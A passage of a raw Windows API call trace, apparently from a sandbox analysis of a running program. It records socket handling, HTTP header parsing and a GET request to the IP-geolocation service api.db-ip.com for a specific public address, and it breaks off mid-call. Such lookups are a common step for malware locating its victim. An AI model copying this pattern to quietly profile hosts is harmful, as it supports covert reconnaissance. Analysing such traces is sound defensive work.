[0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] ResetEvent (hEvent=0x3f0) returned 1 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] ResetEvent (hEvent=0x3f0) returned 1 [0103.113] GetLocalTime (in: lpSystemTime=0x19fc78 | out: lpSystemTime=0x19fc78*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x216)) [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] SetEvent (hEvent=0x3f4) returned 1 [0103.113] SetEvent (hEvent=0x3f0) returned 1 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] ResetEvent (hEvent=0x3f0) returned 1 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] ResetEvent (hEvent=0x3f0) returned 1 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.114] GetCurrentThreadId () returned 0x1358 [0103.114] GetCurrentThreadId () returned 0x1358 [0103.114] GetCurrentThreadId () returned 0x1358 [0103.114] GetCurrentThreadId () returned 0x1358 [0103.114] SetEvent (hEvent=0x3f4) returned 1 [0103.114] SetEvent (hEvent=0x3f0) returned 1 [0103.114] GetCurrentThreadId () returned 0x1358 [0103.114] ResetEvent (hEvent=0x3f0) returned 1 [0103.114] GetCurrentThreadId () returned 0x1358 [0103.114] GetCurrentThreadId () returned 0x1358 [0103.114] GetCurrentThreadId () returned 0x1358 [0103.114] GetCurrentThreadId () returned 0x1358 [0103.114] ResetEvent (hEvent=0x3f0) returned 1 [0103.114] CloseHandle (hObject=0x3f0) returned 1 [0103.114] CloseHandle (hObject=0x3f4) returned 1 [0103.114] GetCurrentThreadId () returned 0x1358 [0103.114] GetCurrentThreadId () returned 0x1358 [0103.114] GetCurrentThreadId () returned 0x1358 [0103.114] GetCurrentThreadId () returned 0x1358 [0103.114] GetCurrentThreadId () returned 0x1358 [0103.114] GetCurrentThreadId () returned 0x1358 [0103.114] shutdown (s=0x3d0, how=1) returned 0 [0103.115] closesocket (s=0x3d0) returned 0 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.115] GetCurrentThreadId () returned 0x1358 [0103.116] GetCurrentThreadId () returned 0x1358 [0103.116] GetCurrentThreadId () returned 0x1358 [0103.116] GetCurrentThreadId () returned 0x1358 [0103.116] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0103.116] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0103.116] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0103.116] GetCurrentThreadId () returned 0x1358 [0103.116] GetCurrentThreadId () returned 0x1358 [0103.116] GetCurrentThreadId () returned 0x1358 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/v2/free/95.222.165.118/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PATCH", cchCount2=5) returned 1 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PATCH", cchCount2=5) returned 1 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="api.db-ip.com", cchCount2=13) returned 1 [0103.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0103.117] socket (af=2, type=1, protocol=0) returned 0x3d0 [0103.118] getsockopt (in: s=0x3d0, level=65535, optname=4104, optval=0x19fb10, optlen=0x19fb0c | out: optval="\x01", optlen=0x19fb0c) returned 0 [0103.118] getsockopt (in: s=0x3d0, level=6, optname=1, optval=0x19fb10, optlen=0x19fb0c | out: optval="", optlen=0x19fb0c) returned 0 [0103.118] setsockopt (s=0x3d0, level=65535, optname=4, optval="", optlen=4) returned 0 [0103.118] htons (hostshort=0x0) returned 0x0 [0103.118] bind (s=0x3d0, addr=0x19fa68*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0103.118] getsockname (in: s=0x3d0, name=0x19fa5c, namelen=0x19fadc | out: name=0x19fa5c*(sa_family=2, sin_port=0xc21e, sin_addr="0.0.0.0"), namelen=0x19fadc) returned 0 [0103.118] htons (hostshort=0x1ec2) returned 0xc21e [0103.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="api.db-ip.com", cchCount1=13, lpString2="LOCALHOST", cchCount2=9) returned 1 [0103.118] GetAddrInfoW (in: pNodeName="api.db-ip.com", pServiceName=0x0, pHints=0x19fb10*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fb30 | out: ppResult=0x19fb30*=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c0f8*(sa_family=2, sin_port=0x0, sin_addr="104.26.5.15"), ai_next=0xa1ebe8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c218*(sa_family=2, sin_port=0x0, sin_addr="104.26.4.15"), ai_next=0x0))) returned 0 [0103.119] FreeAddrInfoW (pAddrInfo=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c0f8*(sa_family=2, sin_port=0x0, sin_addr="104.26.5.15"), ai_next=0xa1ebe8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c218*(sa_family=2, sin_port=0x0, sin_addr="104.26.4.15"), ai_next=0x0))) [0103.119] htons (hostshort=0x50) returned 0x5000 [0103.119] connect (s=0x3d0, name=0x19fac0*(sa_family=2, sin_port=0x50, sin_addr="104.26.5.15"), namelen=16) returned 0 [0103.139] getsockname (in: s=0x3d0, name=0x19faa8, namelen=0x19fb28 | out: name=0x19faa8*(sa_family=2, sin_port=0xc21e, sin_addr="192.168.0.147"), namelen=0x19fb28) returned 0 [0103.139] htons (hostshort=0x1ec2) returned 0xc21e [0103.139] getpeername (in: s=0x3d0, name=0x19faa8, namelen=0x19fb28 | out: name=0x19faa8*(sa_family=2, sin_port=0x50, sin_addr="104.26.5.15"), namelen=0x19fb28) returned 0 [0103.139] htons (hostshort=0x5000) returned 0x50 [0103.139] GetCurrentThreadId () returned 0x1358 [0103.139] GetCurrentThreadId () returned 0x1358 [0103.139] GetCurrentThreadId () returned 0x1358 [0103.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="Accept", cchCount2=6) returned 3 [0103.139] GetCurrentThreadId () returned 0x1358 [0103.139] GetCurrentThreadId () returned 0x1358 [0103.139] GetCurrentThreadId () returned 0x1358 [0103.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="User-Agent", cchCount2=10) returned 1 [0103.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept", cchCount1=6, lpString2="User-Agent", cchCount2=10) returned 1 [0103.139] GetCurrentThreadId () returned 0x1358 [0103.139] GetCurrentThreadId () returned 0x1358 [0103.139] GetCurrentThreadId () returned 0x1358 [0103.139] send (s=0x3d0, buf=0x24049b8*, len=198, flags=0) returned 198 [0103.140] GetTickCount64 () returned 0x115b14b [0103.140] select (in: nfds=0, readfds=0x19fa24, writefds=0x0, exceptfds=0x0, timeout=0x0 | out: readfds=0x19fa24, writefds=0x0, exceptfds=0x0) returned 1 [0103.170] recv (in: s=0x3d0, buf=0x242e938, len=32768, flags=0 | out: buf=0x242e938*) returned 508 [0103.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.0", cchCount1=3, lpString2="1.1", cchCount2=3) returned 1 [0103.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.1", cchCount1=3, lpString2="1.1", cchCount2=3) returned 2 [0103.170] GetTickCount64 () returned 0x115b16a [0103.170] GetTickCount64 () returned 0x115b16a [0103.170] GetTickCount64 () returned 0x115b16a [0103.170] GetTickCount64 () returned 0x115b16a [0103.170] GetTickCount64 () returned 0x115b16a [0103.170] GetTickCount64 () returned 0x115b16a [0103.170] GetTickCount64 () returned 0x115b16a [0103.170] GetTickCount64 () returned 0x115b16a [0103.170] GetTickCount64 () returned 0x115b16a [0103.170] GetTickCount64 () returned 0x115b16a [0103.170] GetTickCount64 () returned 0x115b16a [0103.170] GetTickCount64 () returned 0x115b16a [0103.170] GetTickCount64 () returned 0x115b16a [0103.170] GetTickCount64 () returned 0x115b16a [0103.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0103.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Cache-control", cchCount2=13) returned 3 [0103.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Cache-control", cchCount2=13) returned 3 [0103.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Cache-control", cchCount2=13) returned 3 [0103.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Cache-control", cchCount2=13) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Cache-control", cchCount2=13) returned 1 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Cache-control", cchCount2=13) returned 2 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Connection", cchCount2=10) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Connection", cchCount2=10) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Connection", cchCount2=10) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Connection", cchCount2=10) returned 2 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Version", cchCount2=15) returned 1 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Version", cchCount2=15) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Version", cchCount2=15) returned 1 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Version", cchCount2=15) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Version", cchCount2=15) returned 1 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Version", cchCount2=15) returned 1 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Version", cchCount2=15) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Version", cchCount2=15) returned 1 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Version", cchCount2=15) returned 1 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Version", cchCount2=15) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Version", cchCount2=15) returned 1 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Language", cchCount2=16) returned 3 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Language", cchCount2=16) returned 3 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Language", cchCount2=16) returned 1 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Language", cchCount2=16) returned 3 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Language", cchCount2=16) returned 1 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Language", cchCount2=16) returned 1 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Language", cchCount2=16) returned 3 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Language", cchCount2=16) returned 1 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Language", cchCount2=16) returned 1 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Language", cchCount2=16) returned 3 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Language", cchCount2=16) returned 1 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Type", cchCount2=12) returned 3 [0103.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Type", cchCount2=12) returned 2 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTF-8", cchCount1=1, lpString2="\"", cchCount2=1) returned 3 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="charset=UTF-8", cchCount1=7, lpString2="charset", cchCount2=7) returned 2 [0103.173] GetCurrentThreadId () returned 0x1358 [0103.173] GetCurrentThreadId () returned 0x1358 [0103.173] GetCurrentThreadId () returned 0x1358 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Length", cchCount2=14) returned 3 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Length", cchCount2=14) returned 3 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Length", cchCount2=14) returned 1 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Length", cchCount2=14) returned 3 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Length", cchCount2=14) returned 1 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Length", cchCount2=14) returned 1 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Length", cchCount2=14) returned 3 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Length", cchCount2=14) returned 1 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Length", cchCount2=14) returned 1 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Length", cchCount2=14) returned 3 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Length", cchCount2=14) returned 1 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Range", cchCount2=13) returned 3 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Range", cchCount2=13) returned 3 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Range", cchCount2=13) returned 1 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 